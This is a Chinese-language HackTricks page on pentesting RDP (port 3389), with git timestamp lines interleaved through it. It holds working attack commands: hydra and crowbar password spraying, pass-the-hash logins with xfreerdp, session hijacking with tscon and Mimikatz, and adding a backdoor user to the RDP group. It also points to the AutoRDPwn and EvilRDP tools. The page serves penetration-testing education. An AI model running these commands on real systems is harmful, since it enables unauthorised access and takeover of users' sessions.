2024-05-05 22:03:00 +00:00
# 3389 - 渗透测试 RDP
2022-04-28 16:01:33 +00:00
< details >
2024-05-05 22:03:00 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-05-05 22:03:00 +00:00
支持 HackTricks 的其他方式:
2024-01-11 13:57:14 +00:00
2024-05-08 16:28:00 +00:00
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2024-05-05 22:03:00 +00:00
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
2024-05-08 16:28:00 +00:00
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** 上关注**我们。
2024-05-05 22:03:00 +00:00
* 通过向 [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-05-08 16:28:00 +00:00
< figure > < img src = "../.gitbook/assets/image (14) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-04-30 21:54:03 +00:00
2024-05-08 16:28:00 +00:00
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,拥有 20 多种工具和功能,从侦察到报告。我们不取代渗逗者 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。
2023-04-30 21:54:03 +00:00
2024-01-11 13:57:14 +00:00
{% embed url="https://pentest-tools.com/" %}
2023-04-30 21:54:03 +00:00
2023-08-03 19:12:22 +00:00
## 基本信息
2022-04-28 16:01:33 +00:00
2024-05-05 22:03:00 +00:00
由 Microsoft 开发,**远程桌面协议**( **RDP**)旨在实现计算机之间的图形界面连接。为建立这种连接,用户使用 **RDP** 客户端软件,同时,远程计算机需要运行 **RDP** 服务器软件。这种设置允许对远程计算机的桌面环境进行无缝控制和访问,实质上将其界面带到用户的本地设备上。
2020-07-15 15:43:14 +00:00
2023-12-26 21:49:09 +00:00
**默认端口:** 3389
2022-05-01 13:25:53 +00:00
```
2020-07-15 15:43:14 +00:00
PORT STATE SERVICE
3389/tcp open ms-wbt-server
```
2023-08-03 19:12:22 +00:00
## 枚举
2020-07-15 15:43:14 +00:00
2024-02-08 22:20:49 +00:00
### 自动化
2024-05-08 16:28:00 +00:00
{% code overflow="wrap" %}
2023-08-03 19:12:22 +00:00
```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 < IP >
```
2023-12-26 21:49:09 +00:00
{% endcode %}
2024-05-05 22:03:00 +00:00
它检查可用的加密和DoS漏洞( 在不导致服务DoS的情况下) , 并获取NTLM Windows信息( 版本) 。
2023-08-03 19:12:22 +00:00
### [暴力破解](../generic-methodologies-and-resources/brute-force.md#rdp)
2024-02-08 22:20:49 +00:00
**注意,您可能会锁定帐户**
2023-08-03 19:12:22 +00:00
2024-02-08 22:20:49 +00:00
### **密码喷洒**
2023-08-03 19:12:22 +00:00
2024-02-08 22:20:49 +00:00
**注意,您可能会锁定帐户**
2020-07-15 15:43:14 +00:00
```bash
2022-10-03 20:20:19 +00:00
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
2020-07-15 15:43:14 +00:00
```
2024-02-08 22:20:49 +00:00
### 使用已知凭据/哈希连接
2020-07-15 15:43:14 +00:00
```bash
2022-10-03 20:20:19 +00:00
rdesktop -u < username > < IP >
rdesktop -d < domain > -u < username > -p < password > < IP >
xfreerdp [/d:domain] /u:< username > /p:< password > /v:< IP >
xfreerdp [/d:domain] /u:< username > /pth:< hash > /v:< IP > #Pass the hash
2020-07-15 15:43:14 +00:00
```
2024-03-29 21:06:45 +00:00
### 检查已知凭据是否适用于RDP服务
2020-07-15 15:43:14 +00:00
2024-05-08 16:28:00 +00:00
rdp\_check.py来自impacket, 让您可以检查某些凭据是否适用于RDP服务:
2020-07-15 15:43:14 +00:00
```bash
2022-10-03 20:20:19 +00:00
rdp_check < domain > /< name > :< password > @< IP >
2020-07-15 15:43:14 +00:00
```
2024-05-08 16:28:00 +00:00
< figure > < img src = "../.gitbook/assets/image (14) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-01-11 13:57:14 +00:00
2024-05-08 16:28:00 +00:00
**立即可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,为他们节省时间深入挖掘、弹出 shell 并享受乐趣。
2024-01-11 13:57:14 +00:00
{% embed url="https://pentest-tools.com/" %}
2023-08-03 19:12:22 +00:00
## **攻击**
2020-07-15 15:43:14 +00:00
2024-02-08 22:20:49 +00:00
### 会话劫持
2022-10-03 20:20:19 +00:00
2024-05-08 16:28:00 +00:00
拥有**系统权限**,您可以访问任何用户打开的 RDP 会话,而无需知道所有者的密码。
2020-07-15 15:43:14 +00:00
2024-02-08 22:20:49 +00:00
**获取已打开的会话:**
2022-05-01 13:25:53 +00:00
```
2020-07-15 15:43:14 +00:00
query user
```
2024-02-08 22:20:49 +00:00
**访问所选会话**
2020-07-15 15:43:14 +00:00
```bash
tscon < ID > /dest:< SESSIONNAME >
```
2024-03-29 21:06:45 +00:00
现在, 您将进入所选的RDP会话, 并且您将使用仅限Windows工具和功能来模拟用户。
2020-07-15 15:43:14 +00:00
2024-05-08 16:28:00 +00:00
**重要提示**: 当您访问活动的RDP会话时, 您将会将正在使用该会话的用户踢出。
2020-07-15 15:43:14 +00:00
2024-05-08 16:28:00 +00:00
您可以通过转储进程来获取密码, 但这种方法速度更快, 并且可以让您与用户的虚拟桌面进行交互( 例如在记事本中查看密码, 而不会将其保存在磁盘中, 或者在其他计算机上打开的其他RDP会话...)
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
#### **Mimikatz**
2020-07-15 15:43:14 +00:00
2024-02-08 22:20:49 +00:00
您也可以使用Mimikatz来执行此操作:
2020-07-15 15:43:14 +00:00
```bash
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
```
2022-10-03 20:20:19 +00:00
### Sticky-keys & Utilman
2020-07-15 15:43:14 +00:00
2024-05-05 22:03:00 +00:00
结合这种技术与**stickykeys**或**utilman, 您将能够随时访问管理CMD和任何RDP会话**
2020-07-15 15:43:14 +00:00
2024-05-08 16:28:00 +00:00
您可以使用以下命令搜索已经使用其中一种技术后门的RDP: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
2020-07-15 15:43:14 +00:00
2024-02-08 22:20:49 +00:00
### RDP进程注入
2022-10-03 20:20:19 +00:00
2024-05-08 16:28:00 +00:00
如果来自不同域或**拥有更高权限的用户通过RDP登录**到您作为管理员的PC, 您可以**将您的beacon注入到他的RDP会话进程**中并扮演他的角色:
2022-08-16 00:18:24 +00:00
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md ](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md )
{% endcontent-ref %}
2023-12-26 21:49:09 +00:00
### 将用户添加到RDP组
2020-07-15 15:43:14 +00:00
```bash
net localgroup "Remote Desktop Users" UserLoginName /add
```
2023-12-26 21:49:09 +00:00
## 自动化工具
* [**AutoRDPwn** ](https://github.com/JoelGMSec/AutoRDPwn )
2020-07-15 15:43:14 +00:00
2024-05-08 16:28:00 +00:00
**AutoRDPwn** 是一个使用 Powershell 创建的后渗透框架,主要设计用于自动化对 Microsoft Windows 计算机进行 **Shadow** 攻击。这个由 Microsoft 列为功能的漏洞允许远程攻击者在未经同意的情况下**查看受害者的桌面**,甚至可以根据需要控制受害者的桌面,使用操作系统本身的工具。
2022-10-03 20:20:19 +00:00
2023-12-26 21:49:09 +00:00
* [**EvilRDP** ](https://github.com/skelsec/evilrdp )
2024-05-08 16:28:00 +00:00
* 从命令行以自动化方式控制鼠标和键盘
* 从命令行以自动化方式控制剪贴板
* 从客户端生成一个通过 RDP 将网络通信引导到目标的 SOCKS 代理
* 在目标上执行任意 SHELL 和 PowerShell 命令而无需上传文件
2024-02-08 22:20:49 +00:00
* 即使目标上禁用文件传输,也可以与目标之间上传和下载文件
2022-10-03 20:20:19 +00:00
2023-12-26 21:49:09 +00:00
## HackTricks 自动化命令
2022-05-01 13:25:53 +00:00
```
2021-08-12 13:26:30 +00:00
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
2021-08-15 17:55:52 +00:00
Entry_1:
2023-08-03 19:12:22 +00:00
Name: Notes
Description: Notes for RDP
Note: |
2024-02-08 22:20:49 +00:00
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
2021-08-15 17:55:52 +00:00
2023-08-03 19:12:22 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-rdp
2021-08-15 17:55:52 +00:00
Entry_2:
2023-08-03 19:12:22 +00:00
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
2021-08-12 13:26:30 +00:00
```
2024-05-08 16:28:00 +00:00
< figure > < img src = "../.gitbook/assets/image (14) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-04-30 21:54:03 +00:00
2024-05-05 22:03:00 +00:00
**立即提供的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,为他们节省时间深入挖掘、弹出 shell 并享受乐趣。
2023-04-30 21:54:03 +00:00
2024-01-11 13:57:14 +00:00
{% embed url="https://pentest-tools.com/" %}
2023-04-30 21:54:03 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-05-05 22:03:00 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为英雄< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2024-01-11 13:57:14 +00:00
2024-03-29 21:06:45 +00:00
支持 HackTricks 的其他方式:
2022-04-28 16:01:33 +00:00
2024-05-08 16:28:00 +00:00
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2024-03-29 21:06:45 +00:00
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
2024-05-05 22:03:00 +00:00
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
2024-05-08 16:28:00 +00:00
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**。**
2024-03-29 21:06:45 +00:00
* 通过向 [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >